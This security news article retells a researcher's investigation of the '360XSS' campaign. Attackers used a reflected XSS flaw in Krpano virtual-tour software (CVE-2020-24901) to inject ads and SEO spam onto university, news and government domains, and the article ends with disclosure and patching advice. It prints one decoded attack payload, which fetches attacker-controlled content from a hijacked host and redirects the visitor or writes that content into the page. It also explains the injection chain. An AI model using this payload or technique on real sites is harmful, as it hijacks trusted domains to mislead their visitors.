A common cross-site scripting (XSS) vulnerability has been discovered to affect hundreds of websites, including those of major institutions like Yale University, CNN, and various government websites. The 360XSS attack, as it has come to be known, exploits a vulnerability in the Krpano virtual tour software to serve malicious advertisements and enhance search engine optimization for illicit content. The vulnerability, though previously known, was not patched on numerous websites, which allowed attackers to misuse trusted domains for SEO poisoning on a mass scale.
Accidental Discovery Exposes Large-Scale Weakness
The discovery of this large-scale operation began with what seemed like a standard internet query. Security researcher Oleg Zaytsev stumbled upon a suspicious search result that was pointing to the domain of Yale University. The title, containing pornography-related keywords, was instantaneously suspicious. When Zaytsev dug further, he found the link redirected to a pornographic advertisement.
Curious, Zaytsev investigated the URL, which launched a virtual tour on a subdomain of the Yale Quantum Mechanics Institute. The URL had an “xml” parameter that contained a suspicious-looking URL. When he stripped the parameters, it led him to the real virtual tour of Yale’s Quantum Mechanics Institute, which meant that something was definitely amiss with the URL parameters provided.
Diving Deep Into the Technical Details
Zaytsev’s initial suspicion was a subdomain takeover, a common attack when an old CNAME record has been left behind and is hijacked. Closer examination, however, revealed a more complex issue. The “xml” parameter was being used to import external XML content, which was causing an open redirect. When Zaytsev attempted to redirect to a harmless site, such as example.com, the page would error out, indicating there was more to it than a simple redirect.
The initial “xml” parameter was referencing a URL on the official UK Scouts website that had been taken over via an abandoned Azure account. Investigating the response of this URL led to an XML file with an “onloaded” event that included an “eval” function running a Base64-encoded payload. This was a strong sign of a malicious XSS payload.
The decoded payload expressed a script that loaded a target URL from another stolen asset, this time a subdomain of volvo.com, using the “id” parameter to identify the ad campaign.
const queryParams = new URLSearchParams(window.location.search), id = queryParams.get('id'); if (id) { fetch('https://bi-portal-bus.volvo.com/auw/video/sax.php?file='+id) .then(response => response.text()) .then(data => { try { let r = JSON.parse(data); if (r.redirectUrl) { window.location.href = r.redirectUrl; } } catch (e) { document.open(); document.write(data); document.close(); } }) .catch(error => { console.error('Error fetching data:', error); }); } else { console.error('No ID parameter found.'); }Zaytsev realized that this was not the work of a single hacker but a very organized operation with a massive network of hacked assets.
Krpano Framework at the Center of the Weakness
The virtual tour technology was Krpano, which is used for hosting 360° videos and images. Either the website’s implementation or the framework itself was vulnerable. When Zaytsev researched the documentation of Krpano, he discovered that the “xml” parameter, allowing the loading of external XML files, was actually a documented feature.
Further investigation led to CVE-2020-24901, a previously disclosed reflected XSS vulnerability brought about by the “passQueryParameter” configuration in Krpano. The configuration specifies whether query parameters from the hosting page are passed directly into Krpano’s configuration. Krpano’s default installation had this configuration enabled for years, making it easy for attackers to inject arbitrary XML and result in reflected XSS.
Although Krpano developers attempted to remediate the issue by restricting “passQueryParameter” to an allowlist, adding the “xml” parameter to the allowlist manually still left the vulnerability open. Somewhat surprisingly, Krpano’s official website, which hosted live examples of the framework, was also vulnerable.
Uncovering the Extent of the Campaign
Having grasped the technical nature of the vulnerability, Zaytsev focused on determining the scope of the attack. Using Google Dorking techniques, he discovered thousands of ads spread across hundreds of infected sites. Government gateways, state sites, top universities, major hotel chains, news sites, car dealerships, and Fortune 500 companies were on the list. The majority of these sites had millions of monthly visitors and had been targeted multiple times with different types of ads.
The ads weren’t all for pornography. They also hawked diet pills, online casinos, and news hoax sites. A few of the hijacked pages were even being used to boost YouTube video views. It wasn’t a spam operation so much as it was an industrial-scale exploitation of trusted domains.
One example was the official Utah website that had over 100 indexed spam results at the time Zaytsev performed his search. The title, description, and preview image of the injected results were within the attackers’ control, and they used random strings in titles to make each result unique and added fake review counts together with star ratings to lend credibility.
The Motives Behind the Attack
The attackers were taking advantage of the XSS vulnerability largely to redirect users to advertisements. While a direct attack on the vulnerable website and user base would have been more crippling, the attackers likely chose to do this for two reasons. First, they were likely a rogue ad firm more interested in blasting ads than in launching direct cyberattacks. Second, they were operating in a legal gray area, where their actions were unethical but not outright criminal. Stealing user data or launching full-fledged attacks would have attracted law enforcement attention.
But the attackers treated one hijacked site, CNN, differently. Instead of redirecting visitors, the attackers embedded a spoofed article promoting online casinos directly into CNN’s domain. This article, written in Turkish, presented the “Top Reliable Casinos Online.” The attackers were taking advantage of trust by leveraging CNN’s reputation to promote their malicious content.
The XML payload for the CNN exploit was hosted on “jqeury.store,” a domain that served as a hub for multiple instances of the same exploit. Some links also pointed to geo.tv, Pakistan’s largest news site, where similar fake news stories were injected.
Responsible Disclosure Efforts
Zaytsev attempted to report the exploited cases to the affected organizations. Most did not have a vulnerability disclosure program, he found. Many of his reports went unresponded to, drowned in unread inboxes or bounced back without response. Despite these, some reports were successful and earned Zaytsev recognition from organizations like the U.S. Department of Health & Human Services and CERT-EU.
Zaytsev also reached out to Krpano’s developers, bringing the vulnerable implementation on their own website to their attention and sharing his concern regarding the handling of the XML parameter. Klaus, the lead developer, responded professionally and introduced a fix in version 1.22.4, restricting external resources from being loaded through the XML parameter.
Remediation Steps
In order to remediate the 360XSS vulnerability, website owners are advised to follow these steps:
🔎 Identify all instances of Krpano on your website.
🔄️ Update to the latest version (1.22.4).
✅ Set to “passQueryParameter=false”.
🗑️ Delete infected pages and scan for SEO poisoning via Google Search Console.
Acknowledgement
The information in this article is based on research that was conducted and published by Oleg Zaytsev on his blog, https://olegzay.com/360xss/. We acknowledge with gratitude Zaytsev’s work in finding and documenting this widespread vulnerability.
This incident is a reminder of the importance of keeping software patched and security configurations properly set. Even vulnerabilities that are already disclosed can be utilized in case they are not addressed in time. The scale of the 360XSS campaign indicates to us the impact of such vulnerabilities and the importance for businesses to prioritize security in their web development process.
